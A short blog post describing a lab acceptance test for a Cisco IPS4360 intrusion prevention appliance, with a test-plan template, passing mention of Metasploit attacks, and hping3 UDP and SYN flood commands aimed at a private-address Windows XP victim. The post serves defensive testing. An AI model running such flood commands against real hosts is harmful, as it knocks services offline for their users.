Intrusion detection and prevention test
This post demonstrate an example on how to do IPS factory acceptance test.
Test plan parameters example
Product:IPS4360-K9
Serial Number: abcdefg
Date:27/Jan/2013
Purpose: This test is to test the ability for IPS to block malicious when a signature is matched.
Procedure: On the attacker PC launch metasploit. Launch an attack to the victim. Launch Event viewer to view IPS events.
Expected results:
1. Cisco IPS block the attack Pass/Fail
2. IPS events are shown in event viewer Pass/Fail
3. Metasploit attack has timeout Pass/Fail
Remarks:
You modify your procedure and expected results according to which tool you use. The below will demonstrate the attacks and the expected results by Cisco IPS.
Metasploit attacks
This section demonstrates exploit and payload use for testing without IPS.
Metasploit attacks dropped by Cisco IPS4360
Denial of service attack with hping3
From the attacker’s machine launch hping3 flood.
hping3 --udp --flood 192.168.56.102
open new tab and launch the below command:
hping3 -S --flood 192.168.56.102
Open as many tab as you want to launch multiple of flooding attacks, you should also turn on your Windows XP task manager to monitor the resource usage.
When Cisco IPS blocks this type of attack, it will fire up the alert and block the attack, your Windows XP will not have constant CPU resource between 88% and 90%, it would be normal like between 0% and 9%.
Cisco IPS denial of service event
Other IPS events
This section displays the various IPS events, here you will have an idea on which type of intrusion tools can be fired up by the signatures.
cyruslab 